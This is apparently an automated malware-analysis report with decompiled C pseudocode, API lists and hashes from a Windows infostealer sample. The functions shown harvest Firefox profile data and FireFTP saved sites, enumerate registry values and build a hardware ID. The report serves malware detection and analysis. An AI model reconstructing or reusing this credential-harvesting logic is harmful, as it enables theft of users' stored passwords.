                                                                    				short* _t45;
                                                                    				void* _t47;
                                                                    
                                                                    				_t34 =  &_v8;
                                                                    				_push(_t34);
                                                                    				_push(0x4162cf);
                                                                    				_push(5);
                                                                    				_push(0);
                                                                    				_push(0x4162bf); // executed
                                                                    				L004107A2(); // executed
                                                                    				if(_t34 < 0) {
                                                                    					L15:
                                                                    					return E0040A712(_t47, _a4, L"http://www.facebook.com/", 0);
                                                                    				}
                                                                    				_push( &_v12);
                                                                    				_push(_v8);
                                                                    				if( *((intOrPtr*)( *_v8 + 0x1c))() < 0 || _v12 == 0) {
                                                                    					L14:
                                                                    					 *((intOrPtr*)( *_v8 + 8))(_v8);
                                                                    					goto L15;
                                                                    				} else {
                                                                    					_v48 = 0;
                                                                    					_v44 = 0;
                                                                    					_v52 = 0x28;
                                                                    					while(1) {
                                                                    						_v56 = 0;
                                                                    						_push( &_v56);
                                                                    						_push( &_v52);
                                                                    						_push(1);
                                                                    						_push(_v12);
                                                                    						if( *((intOrPtr*)( *_v12 + 0xc))() != 0 || _v56 != 1) {
                                                                    							break;
                                                                    						}
                                                                    						if(_v48 != 0) {
                                                                    							_t45 = StrStrIW(_v48, 0x4162ef);
                                                                    							if(_t45 == 0) {
                                                                    								_v60 = 0;
                                                                    							} else {
                                                                    								 *_t45 = 0;
                                                                    								_v60 = _t45;
                                                                    							}
                                                                    							E0040A712(_t47, _a4, _v48, _v60); // executed
                                                                    							_push(_v48);
                                                                    							L0041079C();
                                                                    							if(_v44 != 0) {
                                                                    								_push(_v44);
                                                                    								L0041079C();
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					 *((intOrPtr*)( *_v12 + 8))(_v12);
                                                                    					goto L14;
                                                                    				}
                                                                    			}

                                                                    APIs
                                                                    • 73D4B690.OLE32(004162BF,00000000,00000005,004162CF,?), ref: 0040A88D
                                                                    • StrStrIW.SHLWAPI(00000000,004162EF), ref: 0040A904
                                                                    • 73D5A680.OLE32(00000000,00000000,004162EF), ref: 0040A92F
                                                                    • 73D5A680.OLE32(00000000,00000000,00000000,004162EF), ref: 0040A93D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: A680$B690
                                                                    • String ID: ($http://www.facebook.com/
                                                                    • API String ID: 4266887374-3677894361
                                                                    • Opcode ID: e4386c61c5d52dae3f91afb7c524ba0f41b393633d994220be84190847cd43a6
                                                                    • Instruction ID: fb31eb5c0df78cdbf00d2063a309b2630a064c869b031c3f749717a331f3c059
                                                                    • Opcode Fuzzy Hash: e4386c61c5d52dae3f91afb7c524ba0f41b393633d994220be84190847cd43a6
                                                                    • Instruction Fuzzy Hash: 5D312A70A00209EBDF119F94C889FDEFB75BF44314F208566E40076290D3799E95DB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00409DCB(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                    				intOrPtr _v8;
                                                                    				char _v269;
                                                                    				void* _t12;
                                                                    				void* _t23;
                                                                    				void* _t24;
                                                                    				void* _t25;
                                                                    
                                                                    				_t25 = __edi;
                                                                    				_t24 = __ecx;
                                                                    				_t23 = __ebx;
                                                                    				_v8 = E004015F0(_a4, 0x25, 0);
                                                                    				_t12 = E00401EB1(__eflags, 0x1a);
                                                                    				_t27 = _t12;
                                                                    				if(_t12 != 0) {
                                                                    					E00404351(_a4, E00401E4C(_t12, _t12, "\\Mozilla\\Firefox\\"), "fireFTPsites.dat", 0xbeef1000); // executed
                                                                    					E004018B8(_t20);
                                                                    				}
                                                                    				 *0x416030 = 1;
                                                                    				GetCurrentDirectoryA(0x104,  &_v269);
                                                                    				E00409C3C(_t24, _a4,  *0x414869, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
                                                                    				E00409C3C(_t24, _a4, 0x80000002, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
                                                                    				SetCurrentDirectoryA( &_v269);
                                                                    				return E00401636(_t23, _t24, _t25, _t27, _a4, _v8);
                                                                    			}

                                                                    APIs
                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409E28
                                                                    • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409E6D
                                                                      • Part of subcall function 00401E4C: lstrlen.KERNEL32(?), ref: 00401E6D
                                                                      • Part of subcall function 00401E4C: lstrlen.KERNEL32(00000000,?), ref: 00401E77
                                                                      • Part of subcall function 00401E4C: lstrcpy.KERNEL32(00000000,?), ref: 00401E8B
                                                                      • Part of subcall function 00401E4C: lstrcat.KERNEL32(00000000,00000000), ref: 00401E94
                                                                      • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CurrentDirectorylstrlen$FreeLocallstrcatlstrcpy
                                                                    • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\$fireFTPsites.dat
                                                                    • API String ID: 3007406096-624000163
                                                                    • Opcode ID: baf3640e4e59c84cdb8530a01f1c66f88f8b17e9021d25bd85c5b007fc2217b5
                                                                    • Instruction ID: 7ca379dd8bd6ced9b34700e741701d984c4c6656734aaf013cc51c489d735693
                                                                    • Opcode Fuzzy Hash: baf3640e4e59c84cdb8530a01f1c66f88f8b17e9021d25bd85c5b007fc2217b5
                                                                    • Instruction Fuzzy Hash: E1011E70680209BADF21BB61CC47FDE3A699B44744F11807E7A04B51E3DFB9CA909A9D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 93%
                                                                    			E00409C3C(void* __ecx, intOrPtr _a4, void* _a8, char* _a12, char* _a16, intOrPtr _a20) {
                                                                    				void* _v8;
                                                                    				char* _v12;
                                                                    				int _v16;
                                                                    				int _v20;
                                                                    				intOrPtr _v24;
                                                                    				intOrPtr _v28;
                                                                    				long _t37;
                                                                    				long _t41;
                                                                    				void* _t48;
                                                                    				void* _t49;
                                                                    				intOrPtr _t51;
                                                                    				void* _t59;
                                                                    
                                                                    				_t59 = __ecx;
                                                                    				if(StrStrIA(_a12, _a16) != 0) {
                                                                    					_t48 = E00401D71(_a8, _a12, "PathToExe", 0); // executed
                                                                    					_t49 = _t48;
                                                                    					_t61 = _t49;
                                                                    					if(_t49 != 0) {
                                                                    						_push(_t49);
                                                                    						_t51 = E0040242B(_t61, _t49);
                                                                    						_t62 = _t51;
                                                                    						if(_t51 != 0) {
                                                                    							_v28 = _t51;
                                                                    							_t54 = E00401EB1(_t62, 0x1a);
                                                                    							if(E00401EB1(_t62, 0x1a) != 0) {
                                                                    								E00409AC1(_a4, E00401E4C(_t54, _t54, _a20), _v28);
                                                                    								E004018B8(_t56);
                                                                    							}
                                                                    							E004018B8(_v28);
                                                                    						}
                                                                    						E004018B8();
                                                                    					}
                                                                    				}
                                                                    				_v12 = E004018CF(0x800);
                                                                    				_t37 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                    				if(_t37 == 0) {
                                                                    					_v20 = 0;
                                                                    					while(1) {
                                                                    						_v16 = 0x7ff;
                                                                    						_t41 = RegEnumKeyExA(_v8, _v20, _v12,  &_v16, 0, 0, 0, 0);
                                                                    						_t42 = _t41;
                                                                    						if(_t41 != 0) {
                                                                    							break;
                                                                    						}
                                                                    						_v24 = E00401E4C(E00401DF8(_t42, _a12, "\\"), _t43, _v12);
                                                                    						E00409C3C(_t59, _a4, _a8, _v24, _a16, _a20);
                                                                    						E004018B8(_v24);
                                                                    						_v20 = _v20 + 1;
                                                                    					}
                                                                    					RegCloseKey(_v8);
                                                                    				}
                                                                    				return E004018B8(_v12);
                                                                    			}


                                                                    APIs
                                                                    • StrStrIA.SHLWAPI(?,?), ref: 00409C48
                                                                    • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                                                                    • RegEnumKeyExA.ADVAPI32 ref: 00409CEB
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                                                                      • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                                      • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                                      • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                                      • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                                      • Part of subcall function 00401E4C: lstrlen.KERNEL32(?), ref: 00401E6D
                                                                      • Part of subcall function 00401E4C: lstrlen.KERNEL32(00000000,?), ref: 00401E77
                                                                      • Part of subcall function 00401E4C: lstrcpy.KERNEL32(00000000,?), ref: 00401E8B
                                                                      • Part of subcall function 00401E4C: lstrcat.KERNEL32(00000000,00000000), ref: 00401E94
                                                                      • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$CloseEnumFreeLocalOpenlstrcatlstrcpy
                                                                    • String ID: PathToExe
                                                                    • API String ID: 3012581338-1982016430
                                                                    • Opcode ID: 0d496da54591456cbef0a006f5e3d3f3319e3d22a83b4c503ccc3a2f1cc45d87
                                                                    • Instruction ID: 26fdae1b99b3a41fd3c75be40dc832e850ec111ed163878dae6f9528ba595cbd
                                                                    • Opcode Fuzzy Hash: 0d496da54591456cbef0a006f5e3d3f3319e3d22a83b4c503ccc3a2f1cc45d87
                                                                    • Instruction Fuzzy Hash: BE310F7195410ABAEF017FA1CD42EEE7F75EF04304F104436BA10750F2DA799A60AB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 77%
                                                                    			E004027F7(void* __ecx, void* __edx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                    				char _v8;
                                                                    				intOrPtr _v12;
                                                                    				void* _v16;
                                                                    				char _v277;
                                                                    				void* __ebx;
                                                                    				void* __ebp;
                                                                    				void* _t23;
                                                                    				void* _t24;
                                                                    				long _t27;
                                                                    				void* _t32;
                                                                    				void* _t35;
                                                                    				void* _t36;
                                                                    				void** _t41;
                                                                    				void** _t42;
                                                                    				void* _t44;
                                                                    				void* _t50;
                                                                    				void* _t51;
                                                                    				void* _t52;
                                                                    				void* _t53;
                                                                    
                                                                    				_t53 = __edi;
                                                                    				_t52 = __edx;
                                                                    				_t51 = __ecx;
                                                                    				_t23 = E00401D71( *0x414869, "Software\\WinRAR", _a4, _a8); // executed
                                                                    				_t24 = _t23;
                                                                    				if(_t24 != 0) {
                                                                    					return _t24;
                                                                    				}
                                                                    				_t50 = 0;
                                                                    				_t27 = GetTempPathA(0x104,  &_v277);
                                                                    				if(_t27 == 0) {
                                                                    					L12:
                                                                    					return _t50;
                                                                    				}
                                                                    				_t56 = _t27 - 0x104;
                                                                    				if(_t27 <= 0x104) {
                                                                    					E00401000( &_v8, _t51, _t56,  &_v8);
                                                                    					_t32 = E004025A9( &_v277);
                                                                    					_t57 = _t32;
                                                                    					if(_t32 != 0) {
                                                                    						_t35 = E00401DF8( &_v277,  &_v277, _a4);
                                                                    					} else {
                                                                    						_t35 = E00401E4C(E00401DF8( &_v277,  &_v277, "\\"), _t49, _a4);
                                                                    					}
                                                                    					_push(_t35);
                                                                    					_push(_v8);
                                                                    					_push(_t35); // executed
                                                                    					_t36 = E0040120D(_t35, _t57); // executed
                                                                    					_t37 = _t36;
                                                                    					_t58 = _t36;
                                                                    					if(_t36 != 0) {
                                                                    						_v12 = E00401082(_t37, _t53, _t58, _v8);
                                                                    						if(_v12 != 0) {
                                                                    							_t41 =  &_v16;
                                                                    							_push(_t41);
                                                                    							_push(_v8);
                                                                    							L00410790();
                                                                    							if(_t41 >= 0) {
                                                                    								GlobalFix(_v16);
                                                                    								_t42 = _t41;
                                                                    								_t61 = _t42;
                                                                    								if(_t42 != 0) {
                                                                    									_t50 = E004018CF(_v12);
                                                                    									_t44 = _t42;
                                                                    									E00401906(_t44, _t50, _v12);
                                                                    									GlobalUnWire(_v16);
                                                                    									_push(_v12);
                                                                    									_pop( *__eax);
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					E00401021(E004018B8(), _t50, _t51, _t52, _t61, _v8);
                                                                    				}
                                                                    			}


                                                                    APIs
                                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 0040282D
                                                                    • 73D83240.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 004028AF
                                                                    • GlobalFix.KERNEL32 ref: 004028BB
                                                                    • GlobalUnWire.KERNEL32 ref: 004028DD
                                                                      • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                                      • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                                      • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                                      • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                                      • Part of subcall function 00401E4C: lstrlen.KERNEL32(?), ref: 00401E6D
                                                                      • Part of subcall function 00401E4C: lstrlen.KERNEL32(00000000,?), ref: 00401E77
                                                                      • Part of subcall function 00401E4C: lstrcpy.KERNEL32(00000000,?), ref: 00401E8B
                                                                      • Part of subcall function 00401E4C: lstrcat.KERNEL32(00000000,00000000), ref: 00401E94
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$Globallstrcatlstrcpy$D83240PathTempWire
                                                                    • String ID: Software\WinRAR
                                                                    • API String ID: 1367430239-224198155
                                                                    • Opcode ID: fffe50fdf767dd8ea32efbb047cc9c8ce0fda29c0e5d1d40fdb022eba92d0d02
                                                                    • Instruction ID: b236df76ed398757315f06d6d85d08d7d8e67b150c60cd6550e710cec1d30196
                                                                    • Opcode Fuzzy Hash: fffe50fdf767dd8ea32efbb047cc9c8ce0fda29c0e5d1d40fdb022eba92d0d02
                                                                    • Instruction Fuzzy Hash: 01211D76900109BBDF55BBA1CD46EDEBB69AF04348F108576B600B10E1D6B98B94AB18
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040480D(intOrPtr _a4, char* _a8) {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				int _v16;
                                                                    				char _v2064;
                                                                    				intOrPtr _v2068;
                                                                    				int _v2072;
                                                                    				char _v2076;
                                                                    				long _t31;
                                                                    				long _t32;
                                                                    				intOrPtr _t44;
                                                                    
                                                                    				_t31 = RegOpenKeyA( *0x414869, _a8,  &_v8); // executed
                                                                    				_t32 = _t31;
                                                                    				if(_t32 == 0) {
                                                                    					_v12 = 0;
                                                                    					while(1) {
                                                                    						_v16 = 0x7ff;
                                                                    						if(RegEnumValueA(_v8, _v12,  &_v2064,  &_v16, 0,  &_v2072, 0, 0) != 0) {
                                                                    							break;
                                                                    						}
                                                                    						if(_v2072 == 1 || _v2072 == 7) {
                                                                    							if(StrStrIA( &_v2064, "Line") == 0) {
                                                                    								L13:
                                                                    								_v12 = _v12 + 1;
                                                                    								continue;
                                                                    							}
                                                                    							_t44 = E00401D71( *0x414869, _a8,  &_v2064,  &_v2076);
                                                                    							if(_t44 == 0) {
                                                                    								goto L13;
                                                                    							}
                                                                    							_v2068 = _t44;
                                                                    							E00401569(_a4, 0xbeef0001);
                                                                    							if(_v2072 != 1) {
                                                                    								E00401569(_a4, 1);
                                                                    							} else {
                                                                    								E00401569(_a4, 0);
                                                                    							}
                                                                    							E0040159F(_a4, _v2068, _v2076);
                                                                    							E004018B8(_v2068);
                                                                    							goto L13;
                                                                    						} else {
                                                                    							_v12 = _v12 + 1;
                                                                    							continue;
                                                                    						}
                                                                    					}
                                                                    					return RegCloseKey(_v8);
                                                                    				}
                                                                    				return _t32;
                                                                    			}


                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,?), ref: 00404823
                                                                    • RegEnumValueA.ADVAPI32 ref: 0040485C
                                                                    • StrStrIA.SHLWAPI(?,Line), ref: 0040488D
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000001,00000000,00000000,?,Line), ref: 00404912
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEnumOpenValue
                                                                    • String ID: Line
                                                                    • API String ID: 4012628704-1898322888
                                                                    • Opcode ID: 2b46cda1a647df25163245a46f888817f96ffd0b22f7560dbeb1d8669d88c653
                                                                    • Instruction ID: c1fe354c5df2d147472c63de0b99e33003b149c2ae87472fa03303622d3e56eb
                                                                    • Opcode Fuzzy Hash: 2b46cda1a647df25163245a46f888817f96ffd0b22f7560dbeb1d8669d88c653
                                                                    • Instruction Fuzzy Hash: 652139B590011CBACF21ABA1CC41AED7BB9BF40304F00C4B6B644B50A0DB799B969F99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040E380(void* __ecx, void* _a4, char* _a8, intOrPtr _a12) {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				int _v16;
                                                                    				char _v2064;
                                                                    				char* _v2068;
                                                                    				int _v2072;
                                                                    				char _v2076;
                                                                    				long _t27;
                                                                    				long _t28;
                                                                    				char* _t37;
                                                                    				void* _t43;
                                                                    
                                                                    				_t43 = __ecx;
                                                                    				_t27 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
                                                                    				_t28 = _t27;
                                                                    				if(_t28 == 0) {
                                                                    					_v12 = 0;
                                                                    					while(1) {
                                                                    						_v16 = 0x7ff;
                                                                    						if(RegEnumValueA(_v8, _v12,  &_v2064,  &_v16, 0,  &_v2072, 0, 0) != 0) {
                                                                    							break;
                                                                    						}
                                                                    						if(_v2072 == 1) {
                                                                    							_t37 = E00401D71(_a4, _a8,  &_v2064,  &_v2076);
                                                                    							if(_t37 == 0) {
                                                                    								L10:
                                                                    								_v12 = _v12 + 1;
                                                                    								continue;
                                                                    							}
                                                                    							_v2068 = _t37;
                                                                    							if(StrStrIA(_v2068, ".wjf") != 0) {
                                                                    								E0040E0FE(_t43, _a12, _v2068);
                                                                    							}
                                                                    							E004018B8(_v2068);
                                                                    							goto L10;
                                                                    						}
                                                                    						_v12 = _v12 + 1;
                                                                    					}
                                                                    					return RegCloseKey(_v8);
                                                                    				}
                                                                    				return _t28;
			}

                                                                    0x0040e380
                                                                    0x0040e393
                                                                    0x0040e398
                                                                    0x0040e39a
                                                                    0x0040e3a0
                                                                    0x0040e3a7
                                                                    0x0040e3a7
                                                                    0x0040e3d3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040e3de
                                                                    0x0040e3fe
                                                                    0x0040e400
                                                                    0x0040e435
                                                                    0x0040e435
                                                                    0x00000000
                                                                    0x0040e435
                                                                    0x0040e402
                                                                    0x0040e41a
                                                                    0x0040e425
                                                                    0x0040e425
                                                                    0x0040e430
                                                                    0x00000000
                                                                    0x0040e430
                                                                    0x0040e3e0
                                                                    0x0040e3e0
                                                                    0x00000000
                                                                    0x0040e440
                                                                    0x0040e446

                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E393
                                                                    • RegEnumValueA.ADVAPI32 ref: 0040E3CC
                                                                    • StrStrIA.SHLWAPI(?,.wjf), ref: 0040E413
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E440
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEnumOpenValue
                                                                    • String ID: .wjf
                                                                    • API String ID: 4012628704-198459012
                                                                    • Opcode ID: d143b4ee2f8d50745b00719615fd45277ead690ac8305e40d53a9108f53902ff
                                                                    • Instruction ID: 445ef7b8b1bb7aa2afab0b85c8d47674782cb6e9d867fe5de917610d2ab08f6a
                                                                    • Opcode Fuzzy Hash: d143b4ee2f8d50745b00719615fd45277ead690ac8305e40d53a9108f53902ff
                                                                    • Instruction Fuzzy Hash: EE110A3191011CBADF11AF51CC41AEEBBB9FF04304F0484B6B554B11A1DBB99BA1AF99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 59%
                                                                    			E0040456C(void* __ecx, void* __edx, void* __edi) {
                                                                    				signed char _v5;
                                                                    				signed char _v6;
                                                                    				signed char _v7;
                                                                    				signed char _v8;
                                                                    				signed char _v9;
                                                                    				signed char _v10;
                                                                    				signed char _v11;
                                                                    				signed char _v12;
                                                                    				signed short _v14;
                                                                    				signed short _v16;
                                                                    				char _v20;
                                                                    				char _v120;
                                                                    				char _v124;
                                                                    				void* _t19;
                                                                    				char* _t21;
                                                                    
                                                                    				_t19 = E004027F7(__ecx, __edx, __edi, "HWID",  &_v124); // executed
                                                                    				_push(_t19);
                                                                    				if(_t19 == 0 || _v124 <= 0x14) {
                                                                    					_t21 =  &_v20;
                                                                    					_push(_t21);
                                                                    					L00410796();
                                                                    					if(_t21 >= 0) {
                                                                    						wsprintfA( &_v120, "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}", _v20, _v16 & 0x0000ffff, _v14 & 0x0000ffff, _v12 & 0x000000ff, _v11 & 0x000000ff, _v10 & 0x000000ff, _v9 & 0x000000ff, _v8 & 0x000000ff, _v7 & 0x000000ff, _v6 & 0x000000ff, _v5 & 0x000000ff);
                                                                    						_t35 =  &_v120;
                                                                    						_push( &_v120);
                                                                    						L0041066A();
                                                                    						E004026DD("HWID",  &_v120, _t35); // executed
                                                                    					}
                                                                    				}
                                                                    				return E004018B8();
			}

                                                                    0x0040457b
                                                                    0x00404580
                                                                    0x00404583
                                                                    0x0040458b
                                                                    0x0040458e
                                                                    0x0040458f
                                                                    0x00404596
                                                                    0x004045d6
                                                                    0x004045de
                                                                    0x004045e1
                                                                    0x004045e2
                                                                    0x004045f1
                                                                    0x004045f1
                                                                    0x00404596
                                                                    0x004045fc

                                                                    APIs
                                                                      • Part of subcall function 004027F7: GetTempPathA.KERNEL32(00000104,?), ref: 0040282D
                                                                      • Part of subcall function 004027F7: 73D83240.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 004028AF
                                                                      • Part of subcall function 004027F7: GlobalFix.KERNEL32 ref: 004028BB
                                                                      • Part of subcall function 004027F7: GlobalUnWire.KERNEL32 ref: 004028DD
                                                                    • 73CCF260.OLE32(?,00000000), ref: 0040458F
                                                                    • wsprintfA.USER32 ref: 004045D6
                                                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004045E2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Global$D83240F260PathTempWirelstrlenwsprintf
                                                                    • String ID: HWID${%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
                                                                    • API String ID: 2418552426-1100116640
                                                                    • Opcode ID: 9c8c72e958f692cd5c17bb4aee1ff0ebe95c06f2e591f1655062e6d771a0606b
                                                                    • Instruction ID: f53fd9df19a37a7436308050770a6827e165c979ed20dd1958a16c82b6db0aed
                                                                    • Opcode Fuzzy Hash: 9c8c72e958f692cd5c17bb4aee1ff0ebe95c06f2e591f1655062e6d771a0606b
                                                                    • Instruction Fuzzy Hash: 201139A68041987DDB61E3E68C05EFFBAFC590D305B1404ABB6A0E20C2D57DD780AB39
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00409D44(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                    				intOrPtr _v8;
                                                                    				char _v269;
                                                                    				void* _t18;
                                                                    				void* _t20;
                                                                    
                                                                    				_t20 = __eflags;
                                                                    				_t18 = __ecx;
                                                                    				_v8 = E004015F0(_a4, 0x24, 0);
                                                                    				 *0x416030 = 0;
                                                                    				GetCurrentDirectoryA(0x104,  &_v269);
                                                                    				E00409C3C(_t18, _a4,  *0x414869, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
                                                                    				E00409C3C(_t18, _a4, 0x80000002, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
                                                                    				SetCurrentDirectoryA( &_v269);
                                                                    				return E00401636(__ebx, _t18, __edi, _t20, _a4, _v8);
			}

                                                                    0x00409d44
                                                                    0x00409d44
                                                                    0x00409d59
                                                                    0x00409d5c
                                                                    0x00409d72
                                                                    0x00409d8f
                                                                    0x00409dab
                                                                    0x00409db7
                                                                    0x00409dc8

                                                                    APIs
                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409D72
                                                                      • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                                                                      • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                                                                      • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32 ref: 00409CEB
                                                                      • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                                                                    • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409DB7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$CloseEnumOpen
                                                                    • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\
                                                                    • API String ID: 3062143572-2631691096
                                                                    • Opcode ID: 31845e8f246ef1c047a1e8acefb0eee754fa816f229e193014710dde568ae4c8
                                                                    • Instruction ID: e7b17ff52d166462a165f3b6913ad71960ce3cd8d7ded6adb1efb220650c7e13
                                                                    • Opcode Fuzzy Hash: 31845e8f246ef1c047a1e8acefb0eee754fa816f229e193014710dde568ae4c8
                                                                    • Instruction Fuzzy Hash: 4EF06270640208BADF20EB51CC47FCD7A659B04704F10807A7644740E3DFB9CAD09A48
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00409F8F(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                    				intOrPtr _v8;
                                                                    				char _v269;
                                                                    				void* _t18;
                                                                    				void* _t20;
                                                                    
                                                                    				_t20 = __eflags;
                                                                    				_t18 = __ecx;
                                                                    				_v8 = E004015F0(_a4, 0x28, 0);
                                                                    				 *0x416030 = 0;
                                                                    				GetCurrentDirectoryA(0x104,  &_v269);
